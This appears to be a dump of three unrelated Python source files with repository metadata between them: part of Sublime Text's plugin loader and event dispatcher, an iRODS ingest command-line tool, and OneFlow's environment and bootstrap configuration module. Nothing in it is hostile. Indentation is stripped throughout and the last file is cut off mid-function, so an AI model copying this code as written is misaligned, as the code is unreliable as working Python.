'on_query_context': [], 'on_query_completions': [],
'on_text_command': [], 'on_window_command': [],
'on_post_text_command': [], 'on_post_window_command': [],
'on_modified_async': [],
'on_selection_modified_async': [],
'on_pre_save_async': [],
'on_post_save_async': [],
'on_activated_async': [],
'on_deactivated_async': [],
'on_new_async': [],
'on_load_async': [],
'on_clone_async': []}
def unload_module(module):
if "plugin_unloaded" in module.__dict__:
module.plugin_unloaded()
# Check unload_handler too, for backwards compat
if "unload_handler" in module.__dict__:
module.unload_handler()
# Unload the old plugins
if "plugins" in module.__dict__:
for p in module.plugins:
for cmd_cls_list in all_command_classes:
try:
cmd_cls_list.remove(p)
except ValueError:
pass
for c in all_callbacks.values():
try:
c.remove(p)
except ValueError:
pass
def unload_plugin(modulename):
print("unloading plugin", modulename)
was_loaded = modulename in sys.modules
if was_loaded:
m = sys.modules[modulename]
unload_module(m)
del sys.modules[modulename]
def reload_plugin(modulename):
print("reloading plugin", modulename)
if modulename in sys.modules:
m = sys.modules[modulename]
unload_module(m)
m = imp.reload(m)
else:
m = importlib.import_module(modulename)
module_plugins = []
on_activated_targets = []
for type_name in dir(m):
try:
t = m.__dict__[type_name]
if t.__bases__:
is_plugin = False
if issubclass(t, ApplicationCommand):
application_command_classes.append(t)
is_plugin = True
if issubclass(t, WindowCommand):
window_command_classes.append(t)
is_plugin = True
if issubclass(t, TextCommand):
text_command_classes.append(t)
is_plugin = True
if is_plugin:
module_plugins.append(t)
if issubclass(t, EventListener):
obj = t()
for p in all_callbacks.items():
if p[0] in dir(obj):
p[1].append(obj)
if "on_activated" in dir(obj):
on_activated_targets.append(obj)
module_plugins.append(obj)
except AttributeError:
pass
if len(module_plugins) > 0:
m.plugins = module_plugins
if api_ready:
if "plugin_loaded" in m.__dict__:
try:
m.plugin_loaded()
except:
traceback.print_exc()
# Synthesize any required on_activated calls
for el in on_activated_targets:
w = sublime.active_window()
if w:
v = w.active_view()
if v:
try:
el.on_activated(v)
except:
traceback.print_exc()
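# Illustrative sketch of the kind of plugin module this loader scans for
# (hypothetical user plugin, not part of this file):
#
#   import sublime_plugin
#
#   class ExampleCommand(sublime_plugin.TextCommand):
#       def run(self, edit):
#           self.view.insert(edit, 0, "Hello, World!")
#
#   class ExampleListener(sublime_plugin.EventListener):
#       def on_load(self, view):
#           pass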
def create_application_commands():
cmds = []
for class_ in application_command_classes:
cmds.append(class_())
sublime_api.notify_application_commands(cmds)
def create_window_commands(window_id):
window = sublime.Window(window_id)
cmds = []
for class_ in window_command_classes:
cmds.append(class_(window))
return cmds
def create_text_commands(view_id):
view = sublime.View(view_id)
cmds = []
for class_ in text_command_classes:
cmds.append(class_(view))
return cmds
def on_api_ready():
global api_ready
api_ready = True
for m in list(sys.modules.values()):
if "plugin_loaded" in m.__dict__:
try:
m.plugin_loaded()
except:
traceback.print_exc()
# Synthesize an on_activated call
w = sublime.active_window()
if w:
view_id = sublime_api.window_active_view(w.window_id)
if view_id != 0:
try:
on_activated(view_id)
except:
traceback.print_exc()
def on_new(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_new']:
try:
callback.on_new(v)
except:
traceback.print_exc()
def on_new_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_new_async']:
try:
callback.on_new_async(v)
except:
traceback.print_exc()
def on_clone(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_clone']:
try:
callback.on_clone(v)
except:
traceback.print_exc()
def on_clone_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_clone_async']:
try:
callback.on_clone_async(v)
except:
traceback.print_exc()
def on_load(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_load']:
try:
callback.on_load(v)
except:
traceback.print_exc()
def on_load_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_load_async']:
try:
callback.on_load_async(v)
except:
traceback.print_exc()
def on_pre_close(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_pre_close']:
try:
callback.on_pre_close(v)
except:
traceback.print_exc()
def on_close(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_close']:
try:
callback.on_close(v)
except:
traceback.print_exc()
def on_pre_save(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_pre_save']:
try:
callback.on_pre_save(v)
except:
traceback.print_exc()
def on_pre_save_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_pre_save_async']:
try:
callback.on_pre_save_async(v)
except:
traceback.print_exc()
def on_post_save(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_post_save']:
try:
callback.on_post_save(v)
except:
traceback.print_exc()
def on_post_save_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_post_save_async']:
try:
callback.on_post_save_async(v)
except:
traceback.print_exc()
def on_modified(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_modified']:
try:
callback.on_modified(v)
except:
traceback.print_exc()
def on_modified_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_modified_async']:
try:
callback.on_modified_async(v)
except:
traceback.print_exc()
def on_selection_modified(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_selection_modified']:
try:
callback.on_selection_modified(v)
except:
traceback.print_exc()
def on_selection_modified_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_selection_modified_async']:
try:
callback.on_selection_modified_async(v)
except:
traceback.print_exc()
def on_activated(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_activated']:
try:
callback.on_activated(v)
except:
traceback.print_exc()
def on_activated_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_activated_async']:
try:
callback.on_activated_async(v)
except:
traceback.print_exc()
def on_deactivated(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_deactivated']:
try:
callback.on_deactivated(v)
except:
traceback.print_exc()
def on_deactivated_async(view_id):
v = sublime.View(view_id)
for callback in all_callbacks['on_deactivated_async']:
try:
callback.on_deactivated_async(v)
except:
traceback.print_exc()
def on_query_context(view_id, key, operator, operand, match_all):
v = sublime.View(view_id)
for callback in all_callbacks['on_query_context']:
try:
val = callback.on_query_context(v, key, operator, operand, match_all)
if val:
return True
except:
traceback.print_exc()
return False
def normalise_completion(c):
if len(c) == 1:
return (c[0], "", "")
elif len(c) == 2:
return (c[0], "", c[1])
else:
return c
def on_query_completions(view_id, prefix, locations):
v = sublime.View(view_id)
completions = []
flags = 0
for callback in all_callbacks['on_query_completions']:
try:
res = callback.on_query_completions(v, prefix, locations)
if isinstance(res, tuple):
completions += [normalise_completion(c) for c in res[0]]
flags |= res[1]
elif isinstance(res, list):
completions += [normalise_completion(c) for c in res]
except:
traceback.print_exc()
    return (completions, flags)
def on_text_command(view_id, name, args):
v = sublime.View(view_id)
for callback in all_callbacks['on_text_command']:
try:
res = callback.on_text_command(v, name, args)
if isinstance(res, tuple):
return res
elif res:
return (res, None)
except:
traceback.print_exc()
return ("", None)
def on_window_command(window_id, name, args):
window = sublime.Window(window_id)
for callback in all_callbacks['on_window_command']:
try:
res = callback.on_window_command(window, name, args)
if isinstance(res, tuple):
return res
elif res:
return (res, None)
except:
traceback.print_exc()
return ("", None)
def on_post_text_command(view_id, name, args):
v = sublime.View(view_id)
for callback in all_callbacks['on_post_text_command']:
try:
callback.on_post_text_command(v, name, args)
except:
traceback.print_exc()
def on_post_window_command(window_id, name, args):
window = sublime.Window(window_id)
for callback in all_callbacks['on_post_window_command']:
try:
callback.on_post_window_command(window, name, args)
except:
traceback.print_exc()
class Command(object):
def name(self):
clsname = self.__class__.__name__
name = clsname[0].lower()
last_upper = False
for c in clsname[1:]:
if c.isupper() and not last_upper:
name += '_'
name += c.lower()
else:
name += c
last_upper = c.isupper()
if name.endswith("_command"):
name = name[0:-8]
return name
def is_enabled_(self, args):
ret = None
try:
args = self.filter_args(args)
if args:
ret = self.is_enabled(**args)
else:
ret = self.is_enabled()
except TypeError:
ret = self.is_enabled()
if not isinstance(ret, bool):
raise ValueError("is_enabled must return a bool", self)
return ret
def is_enabled(self):
return True
def is_visible_(self, args):
ret = None
try:
args = self.filter_args(args)
if args:
ret = self.is_visible(**args)
else:
ret = self.is_visible()
except TypeError:
ret = self.is_visible()
if not isinstance(ret, bool):
raise ValueError("is_visible must return a bool", self)
return ret
def is_visible(self):
return True
def is_checked_(self, args):
ret = None
try:
args = self.filter_args(args)
if args:
ret = self.is_checked(**args)
else:
ret = self.is_checked()
except TypeError:
ret = self.is_checked()
if not isinstance(ret, bool):
raise ValueError("is_checked must return a bool", self)
return ret
def is_checked(self):
return False
def description_(self, args):
try:
args = self.filter_args(args)
if args != None:
return self.description(**args)
else:
return self.description()
        except TypeError:
return ""
def description(self):
return ""
def filter_args(self, args):
if args:
if 'event' in args and not self.want_event():
args = args.copy()
del args['event']
return args
def want_event(self):
return False
class ApplicationCommand(Command):
def run_(self, edit_token, args):
args = self.filter_args(args)
if args:
return self.run(**args)
else:
return self.run()
def run(self):
pass
class WindowCommand(Command):
def __init__(self, window):
self.window = window
def run_(self, edit_token, args):
args = self.filter_args(args)
if args:
return self.run(**args)
else:
return self.run()
def run(self):
pass
class TextCommand(Command):
def __init__(self, view):
self.view = view
def run_(self, edit_token, args):
args = self.filter_args(args)
if args:
edit = self.view.begin_edit(edit_token, self.name(), args)
try:
return self.run(edit, **args)
finally:
self.view.end_edit(edit)
else:
edit = self.view.begin_edit(edit_token, self.name())
try:
return self.run(edit)
finally:
self.view.end_edit(edit)
def run(self, edit):
pass
class EventListener(object):
pass
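# sys.meta_path finder that delegates module lookups to one ZipLoader per
# registered zip archive (e.g. a .sublime-package file).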
class MultizipImporter(object):
def __init__(self):
self.loaders = []
self.file_loaders = []
    def find_module(self, fullname, path=None):
if not path:
for l in self.loaders:
if l.name == fullname:
return l
for l in self.loaders:
if path == [l.zippath]:
if l.has(fullname):
return l
return None
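# Imports Python modules straight out of a zip archive; plain .py files under
# override_path (when set) take precedence over the zipped sources.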
class ZipLoader(object):
def __init__(self, zippath):
self.zippath = zippath
self.name = os.path.splitext(os.path.basename(zippath))[0]
self.contents = {"":""}
self.packages = {""}
z = zipfile.ZipFile(zippath, 'r')
files = [i.filename for i in z.infolist()]
for f in files:
base, ext = os.path.splitext(f)
if ext != ".py":
continue
paths = base.split('/')
if len(paths) > 0 and paths[len(paths) - 1] == "__init__":
paths.pop()
self.packages.add('.'.join(paths))
try:
self.contents['.'.join(paths)] = z.read(f).decode('utf-8')
except UnicodeDecodeError:
print(f, "in", zippath, "is not utf-8 encoded, unable to load plugin")
continue
while len(paths) > 1:
paths.pop()
parent = '.'.join(paths)
if parent not in self.contents:
self.contents[parent] = ""
self.packages.add(parent)
z.close()
def has(self, fullname):
key = '.'.join(fullname.split('.')[1:])
if key in self.contents:
return True
override_file = os.path.join(override_path, os.sep.join(fullname.split('.')) + '.py')
if os.path.isfile(override_file):
return True
override_package = os.path.join(override_path, os.sep.join(fullname.split('.')))
if os.path.isdir(override_package):
return True
return False
def load_module(self, fullname):
if fullname in sys.modules:
mod = sys.modules[fullname]
else:
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = self.zippath + "/" + fullname
mod.__name__ = fullname
mod.__path__ = [self.zippath]
mod.__loader__ = self
key = '.'.join(fullname.split('.')[1:])
if key in self.contents:
source = self.contents[key]
source_path = key + " in " + self.zippath
is_pkg = key in self.packages
try:
override_file = os.path.join(override_path, os.sep.join(fullname.split('.')) + '.py')
override_package_init = os.path.join(os.path.join(override_path, os.sep.join(fullname.split('.'))), '__init__.py')
if os.path.isfile(override_file):
with open(override_file, 'r') as f:
source = f.read()
source_path = override_file
elif os.path.isfile(override_package_init):
with open(override_package_init, 'r') as f:
source = f.read()
source_path = override_package_init
is_pkg = True
except:
pass
if is_pkg:
mod.__package__ = mod.__name__
else:
mod.__package__ = fullname.rpartition('.')[0]
exec(compile(source, source_path, 'exec'), mod.__dict__)
return mod
override_path = None
multi_importer = MultizipImporter()
sys.meta_path.insert(0, multi_importer)
def update_compressed_packages(pkgs):
multi_importer.loaders = []
for p in pkgs:
try:
multi_importer.loaders.append(ZipLoader(p))
except (FileNotFoundError, zipfile.BadZipFile) as e:
print("error loading " + p + ": " + str(e))
def set_override_path(path):
global override_path
override_path = path
| 27.763271
| 126
| 0.564467
|
57fabcd66a3d0abffdc0048e294218199e90ac29
| 8,874
|
py
|
Python
|
irods_capability_automated_ingest/irods_sync.py
|
trel/irods_capability_automated_ingest
|
38175f5f9788645777a42abca85379f77438941a
|
[
"BSD-3-Clause"
] | null | null | null |
irods_capability_automated_ingest/irods_sync.py
|
trel/irods_capability_automated_ingest
|
38175f5f9788645777a42abca85379f77438941a
|
[
"BSD-3-Clause"
] | null | null | null |
irods_capability_automated_ingest/irods_sync.py
|
trel/irods_capability_automated_ingest
|
38175f5f9788645777a42abca85379f77438941a
|
[
"BSD-3-Clause"
] | null | null | null |
from .sync_task import start_synchronization, stop_synchronization, list_synchronization, monitor_synchronization
import argparse
from uuid import uuid1
import json
import sys
def get_config(args):
return {
"log": {
"filename": getattr(args, "log_filename", None),
"when": getattr(args, "log_when", None),
"interval": getattr(args, "log_interval", None),
"level": getattr(args, "log_level", None)
},
"profile": {
"filename": getattr(args, "profile_filename", None),
"when": getattr(args, "profile_when", None),
"interval": getattr(args, "profile_interval", None),
"level": getattr(args, "profile_level", None)
},
"redis": {
"host": args.redis_host,
"port": args.redis_port,
"db": args.redis_db
}
}
def add_arguments(parser):
parser.add_argument('--log_filename', action="store", type=str, default=None, help="Specify name of log file.")
parser.add_argument('--log_when', action="store", type=str, default=None, help="Specify the type of log_interval (see TimedRotatingFileHandler).")
parser.add_argument('--log_interval', action="store", type=int, default=None, help="Specify the interval with which to rollover the ingest log file.")
parser.add_argument('--log_level', action="store", type=str, default=None, help="Specify minimum level of message to log (DEBUG, INFO, WARNING, ERROR).")
parser.add_argument('--profile_filename', action="store", type=str, default=None, help="Specify name of profile filename.")
parser.add_argument('--profile_when', action="store", type=str, default=None, help="Specify the type of profile_interval (see TimedRotatingFileHandler).")
parser.add_argument('--profile_interval', action="store", type=int, default=None, help="Specify the interval with which to rollover the ingest profile log file.")
parser.add_argument('--profile_level', action="store", type=str, default=None, help="Specify minimum level of message to log for profiling (DEBUG, INFO, WARNING, ERROR).")
parser.add_argument('--redis_host', action="store", type=str, default="localhost", help="Domain or IP address of Redis host.")
parser.add_argument('--redis_port', action="store", type=int, default=6379, help="Port number for Redis.")
parser.add_argument('--redis_db', action="store", type=int, default=0, help="Redis DB number to use for ingest.")
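# Collect the parsed command-line options into the job description dict that is
# handed to start_synchronization().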
def handle_start(args):
    ex_file_arg = args.exclude_file_type
    # Ensure ex_arg_list is always defined, even when no exclusions were given.
    ex_arg_list = []
    if ex_file_arg is not None:
        ex_arg_list = [x.strip() for x in ex_file_arg[0].split(',')]
data = {}
data["restart_queue"] = args.restart_queue
data["path_queue"] = args.path_queue
data["file_queue"] = args.file_queue
data["target"] = args.target
data["root"] = args.root
data["interval"] = args.interval
data["job_name"] = args.job_name if args.job_name else str(uuid1())
data["append_json"] = args.append_json
data["ignore_cache"] = args.ignore_cache
data["initial_ingest"] = args.initial_ingest
data["event_handler"] = args.event_handler
data["config"] = get_config(args)
data["synchronous"] = args.synchronous
data["progress"] = args.progress
data["profile"] = args.profile
data["files_per_task"] = args.files_per_task
data["s3_endpoint_domain"] = args.s3_endpoint_domain
data["s3_region_name"] = args.s3_region_name
data["s3_keypair"] = args.s3_keypair
data["s3_proxy_url"] = args.s3_proxy_url
data["exclude_file_type"] = ex_arg_list
data['exclude_file_name'] = [ ''.join(r) for r in args.exclude_file_name ]
data['exclude_directory_name'] = [ ''.join(r) for r in args.exclude_directory_name ]
data['idle_disconnect_seconds'] = args.irods_idle_disconnect_seconds
return start_synchronization(data)
def handle_stop(args):
stop_synchronization(args.job_name, get_config(args))
return 0
def handle_watch(args):
return monitor_synchronization(args.job_name, True, get_config(args))
def handle_list(args):
jobs = list_synchronization(get_config(args))
print(json.dumps(jobs))
return 0
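# Hypothetical invocation (module path and directories are illustrative only):
#   python -m irods_capability_automated_ingest.irods_sync start \
#       /data/landing_zone /tempZone/home/rods/landing --synchronous --progress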
def main():
parser = argparse.ArgumentParser(description='continuous synchronization utility')
subparsers = parser.add_subparsers(help="subcommand help")
parser_start = subparsers.add_parser("start", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="start help")
parser_start.add_argument('root', metavar='SOURCE_DIRECTORY', type=str, help='Source directory or S3 folder to scan.')
parser_start.add_argument('target', metavar='TARGET_COLLECTION', type=str, help='Target iRODS collection for data objects (created if non-existent).')
parser_start.add_argument('-i', '--interval', action="store", type=int, default=None, help='Restart interval (in seconds). If absent, will only sync once.')
parser_start.add_argument('--file_queue', action="store", type=str, default="file", help='Name for the file queue.')
parser_start.add_argument('--path_queue', action="store", type=str, default="path", help='Name for the path queue.')
parser_start.add_argument('--restart_queue', action="store", type=str, default="restart", help='Name for the restart queue.')
parser_start.add_argument('--event_handler', action="store", type=str, default=None, help='Path to event handler file')
parser_start.add_argument('--job_name', action="store", type=str, default=None, help='Reference name for ingest job (defaults to generated uuid)')
parser_start.add_argument('--append_json', action="store", type=json.loads, default=None, help='Append json output')
parser_start.add_argument("--ignore_cache", action="store_true", default=False, help='Ignore last sync time in cache - like starting a new sync')
parser_start.add_argument("--initial_ingest", action="store_true", default=False, help='Use this flag on initial ingest to avoid check for data object paths already in iRODS.')
parser_start.add_argument('--synchronous', action="store_true", default=False, help='Block until sync job is completed.')
parser_start.add_argument('--progress', action="store_true", default=False, help='Show progress bar and task counts (must have --synchronous flag).')
parser_start.add_argument('--profile', action="store_true", default=False, help='Generate JSON file of system activity profile during ingest.')
parser_start.add_argument('--files_per_task', action="store", type=int, default='50', help='Number of paths to process in a given task on the queue.')
parser_start.add_argument('--s3_endpoint_domain', action="store", type=str, default='s3.amazonaws.com', help='S3 endpoint domain')
parser_start.add_argument('--s3_region_name', action="store", type=str, default='us-east-1', help='S3 region name')
parser_start.add_argument('--s3_keypair', action="store", type=str, default=None, help='Path to S3 keypair file')
parser_start.add_argument('--s3_proxy_url', action="store", type=str, default=None, help='URL to proxy for S3 access')
parser_start.add_argument('--exclude_file_type', nargs=1, action="store", default='none', help='types of files to exclude: regular, directory, character, block, socket, pipe, link')
    parser_start.add_argument('--exclude_file_name', type=list, nargs='+', action="store", default='none', help=r'a list of space-separated python regular expressions defining the file names to exclude such as "(\S+)exclude" "(\S+)\.hidden"')
    parser_start.add_argument('--exclude_directory_name', type=list, nargs='+', action="store", default='none', help=r'a list of space-separated python regular expressions defining the directory names to exclude such as "(\S+)exclude" "(\S+)\.hidden"')
parser_start.add_argument('--irods_idle_disconnect_seconds', action="store", type=int, default=60, help='irods disconnect time in seconds')
add_arguments(parser_start)
parser_start.set_defaults(func=handle_start)
parser_stop = subparsers.add_parser("stop", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="stop help")
parser_stop.add_argument('job_name', action="store", type=str, help='job name')
add_arguments(parser_stop)
parser_stop.set_defaults(func=handle_stop)
parser_watch = subparsers.add_parser("watch", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="watch help")
parser_watch.add_argument('job_name', action="store", type=str, help='job name')
add_arguments(parser_watch)
parser_watch.set_defaults(func=handle_watch)
parser_list = subparsers.add_parser("list", formatter_class=argparse.ArgumentDefaultsHelpFormatter, help="list help")
add_arguments(parser_list)
parser_list.set_defaults(func=handle_list)
args = parser.parse_args()
sys.exit(args.func(args))
if __name__ == "__main__":
main()
| 61.2
| 251
| 0.720645
|
fa5461f002f70e4fc45c7500d7c2d5b8d56d83d2
| 12,639
|
py
|
Python
|
python/oneflow/framework/env_util.py
|
mosout/oneflow
|
afbb221d900f1a340568ae2462b2022f8fcc4b3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/framework/env_util.py
|
mosout/oneflow
|
afbb221d900f1a340568ae2462b2022f8fcc4b3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/framework/env_util.py
|
mosout/oneflow
|
afbb221d900f1a340568ae2462b2022f8fcc4b3d
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import socket
import traceback
from contextlib import closing
import oneflow._oneflow_internal
import oneflow.core.control.ctrl_bootstrap_pb2 as ctrl_bootstrap_pb
import oneflow.core.job.env_pb2 as env_pb
import oneflow.core.job.resource_pb2 as resource_util
import oneflow.framework.c_api_util as c_api_util
import oneflow.framework.hob as hob
import oneflow.framework.scope_util as scope_util
import oneflow.framework.session_context as session_ctx
import oneflow.support.enable_if as enable_if
from oneflow import oneflow_deprecate
def api_all_device_placement(device_type: str) -> oneflow._oneflow_internal.placement:
r"""
Return a placement containing all devices of all machines under env.
Args:
device_type (str): cuda or cpu
For examples:
.. code-block:: python
# world_size = 4, node_size = 1
import oneflow as flow
p = flow.env.all_device_placement("cuda") # oneflow.placement(device_type="cuda", machine_device_ids={0 : [0, 1, 2, 3]}, hierarchy=(4,))
p = flow.env.all_device_placement("cpu") # oneflow.placement(device_type="cpu", machine_device_ids={0 : [0, 1, 2, 3]}, hierarchy=(4,))
"""
return oneflow._oneflow_internal.AllDevicePlacement(device_type)
def api_enable_eager_execution(val: bool = True) -> None:
"""If True, job will execute in eager mode, else use lazy mode(static graph).
Args:
val (bool, optional): Whether eager execution or not. Defaults to True.
"""
return enable_if.unique([enable_eager_environment])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.any_global_function_defined)
def enable_eager_environment(val=True):
return oneflow._oneflow_internal.EnableEagerEnvironment(val)
def api_env_init() -> bool:
"""Init environment for job
Returns:
bool: [description]
"""
return enable_if.unique([env_init, do_nothing])()
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def env_init():
global default_env_proto
is_multi_client = oneflow._oneflow_internal.IsMultiClient()
assert len(default_env_proto.machine) > 0
CompleteEnvProto(default_env_proto, is_multi_client)
c_api_util.InitEnv(default_env_proto, is_multi_client)
if not is_multi_client:
if oneflow._oneflow_internal.CurrentMachineId() == 0:
scope_util.InitScopeStack()
else:
exit(0)
return True
def api_machine(*val: list) -> None:
"""Set machines' hostnames.
For instance:
oneflow.env.machine([{"addr": "192.168.1.1"}, {"addr": "192.168.1.2"}])
Args:
val: `list`, `tuple` or multiple arguments of `dict`. First in the list is the master machine.
"""
return enable_if.unique([machine, do_nothing])(*val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def machine(*val):
del default_env_proto.machine[:]
if len(val) == 1 and isinstance(val[0], (list, tuple)):
val = val[0]
default_env_proto.ClearField("machine")
default_env_proto.machine.extend(_MakeMachine(val))
def api_ctrl_port(val: int) -> None:
"""Set port number used to control the execution across multiple machines. Same on every machine.
Args:
val: a port number accessible to peer machines
"""
return enable_if.unique([ctrl_port, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def ctrl_port(val):
assert type(val) is int
default_env_proto.ctrl_port = val
def api_data_port(val: int) -> None:
"""Set port number used to data transfer among multiple machines. Same on every machine.
Args:
val: a port number accessible to peer machines
"""
return enable_if.unique([data_port, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def data_port(val):
assert type(val) is int
default_env_proto.data_port = val
from oneflow import oneflow_deprecate
@oneflow_deprecate()
def api_grpc_use_no_signal(val: bool = True) -> None:
"""Set rpc use signal or not (deprecate)
Args:
val (bool, optional): True or False. Defaults to True.
"""
print(
"WARNING:",
"oneflow.env.grpc_use_no_signal is deprecated, users no longer need to set rpc use signal or not. \n",
traceback.format_stack()[-2],
)
return None
def api_log_dir(val: str) -> None:
"""Specify a dir to store OneFlow's logging files. If not specified, it is `./log` by default.
Args:
val (str): string , log file path
"""
return enable_if.unique([log_dir, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def log_dir(val):
assert type(val) is str
default_env_proto.cpp_logging_conf.log_dir = val
def api_logtostderr(val: int) -> None:
"""Set whether log messages go to stderr instead of logfiles
Args:
val (int): [description]
"""
return enable_if.unique([logtostderr, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def logtostderr(val):
assert type(val) is int
default_env_proto.cpp_logging_conf.logtostderr = val
def api_logbuflevel(val: int) -> None:
"""Log messages at a level <= this flag are buffered.
Log messages at a higher level are flushed immediately.
Args:
val (int): int, number of level
"""
return enable_if.unique([logbuflevel, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def logbuflevel(val):
assert type(val) is int
default_env_proto.cpp_logging_conf.logbuflevel = val
@enable_if.condition(hob.in_normal_mode & hob.env_initialized)
def do_nothing(*args, **kwargs):
print("Environment has been initialized, this env init will do nothing.")
return False
def CompleteEnvProto(env_proto, is_multi_client):
if is_multi_client:
_UpdateDefaultEnvProtoByMultiClientEnvVars(env_proto)
    if not env_proto.HasField("ctrl_port"):
if len(env_proto.machine) == 1:
env_proto.ctrl_port = _FindFreePort()
else:
raise ValueError(
"a ctrl_port is required if running multi-node, set it with 'oneflow.env.ctrl_port([YOUR PORT])'"
)
def _MakeMachine(machines):
if isinstance(machines, str):
machines = [machines]
rp_machine = env_pb.EnvProto().machine
for m_data in machines:
m = rp_machine.add()
if isinstance(m_data, str):
m.addr = m_data
elif isinstance(m_data, dict):
if "addr" in m_data:
m.addr = m_data["addr"]
if "ctrl_port_agent" in m_data:
m.ctrl_port_agent = m_data["ctrl_port_agent"]
if "data_port_agent" in m_data:
m.data_port_agent = m_data["data_port_agent"]
else:
raise NotImplementedError
id = 0
addrs_for_check = set()
for m in rp_machine:
m.id = id
id += 1
assert m.addr not in addrs_for_check
addrs_for_check.add(m.addr)
return rp_machine
def api_init_bootstrap_confs(*val: list, **kargs) -> None:
return enable_if.unique([MakeBootstrapConfs, do_nothing])(*val, **kargs)
def _MakeBootstrapConf(bootstrap_info: dict):
global config_master_addr
assert config_master_addr.HasField("host"), "must config master host first"
assert config_master_addr.HasField("port"), "must config master port first"
assert config_world_size != 0, "must config world size first"
bootstrap_conf = ctrl_bootstrap_pb.BootstrapConf()
bootstrap_conf.master_addr.CopyFrom(config_master_addr)
bootstrap_conf.world_size = config_world_size
assert "rank" in bootstrap_info
bootstrap_conf.rank = bootstrap_info["rank"]
if "host" in bootstrap_info:
bootstrap_conf.host = bootstrap_info["host"]
global config_bootstrap_ctrl_port
if config_bootstrap_ctrl_port != 0:
bootstrap_conf.ctrl_port = config_bootstrap_ctrl_port
global config_node_size
if config_node_size != 0:
bootstrap_conf.node_size = config_node_size
return bootstrap_conf
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def MakeBootstrapConfs(
node_list, master_port, world_size=0, ctrl_port=-1, node_size=-1
):
"""Set ctrl_bootstrap_conf' info.
For instance:
ONEFLOW_TEST_NODE_LIST=192.168.1.16,192.168.1.15 ONEFLOW_TEST_MASTER_PORT=43256
ONEFLOW_TEST_WORLD_SIZE=2 ONEFLOW_TEST_RANK_CTRL_PORT=34527
Args:
val: `list`, First in the list is the master machine.
"""
if isinstance(node_list, str):
node_list = [node_list]
global global_ctrl_bootstrap_confs
assert len(global_ctrl_bootstrap_confs) == 0, "ctrl_bootstrap_conf has been inited"
global config_master_addr
config_master_addr.host = node_list[0]
config_master_addr.port = master_port
global config_world_size
if world_size == 0:
config_world_size = len(node_list)
else:
assert world_size % len(node_list) == 0
config_world_size = world_size
global config_bootstrap_ctrl_port
if ctrl_port != -1:
config_bootstrap_ctrl_port = ctrl_port
global config_node_size
if node_size != -1:
config_node_size = node_size
rank = 0
for rank_host in node_list:
assert isinstance(rank_host, str)
bootstrap_conf = _MakeBootstrapConf({"rank": rank, "host": rank_host})
if rank == 0:
global default_env_proto
default_env_proto.ctrl_bootstrap_conf.CopyFrom(bootstrap_conf)
global_ctrl_bootstrap_confs.append(bootstrap_conf)
rank += 1
return global_ctrl_bootstrap_confs
def _DefaultEnvProto():
env_proto = env_pb.EnvProto()
machine = env_proto.machine.add()
machine.id = 0
machine.addr = "127.0.0.1"
return env_proto
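# Bind port 0 on localhost so the OS picks an unused port, then report it back.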
def _FindFreePort():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def HasAllMultiClientEnvVars():
env_var_names = ["MASTER_ADDR", "MASTER_PORT", "WORLD_SIZE", "RANK", "LOCAL_RANK"]
env_var_values = [os.getenv(x) for x in env_var_names]
has_no_env_vars = not any(env_var_values)
has_all_env_vars = all(env_var_values)
assert has_no_env_vars or has_all_env_vars, list(zip(env_var_names, env_var_values))
return has_all_env_vars
def SetDefaultMultiClientEnvVars():
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(_FindFreePort())
os.environ["WORLD_SIZE"] = "1"
os.environ["RANK"] = "0"
os.environ["LOCAL_RANK"] = "0"
def _UpdateDefaultEnvProtoByMultiClientEnvVars(env_proto):
assert HasAllMultiClientEnvVars()
def str2int(env_config):
assert env_config.isdigit()
return int(env_config)
bootstrap_conf = ctrl_bootstrap_pb.BootstrapConf()
master_addr = ctrl_bootstrap_pb.Address()
master_addr.host = os.getenv("MASTER_ADDR")
master_addr.port = str2int(os.getenv("MASTER_PORT"))
bootstrap_conf.master_addr.CopyFrom(master_addr)
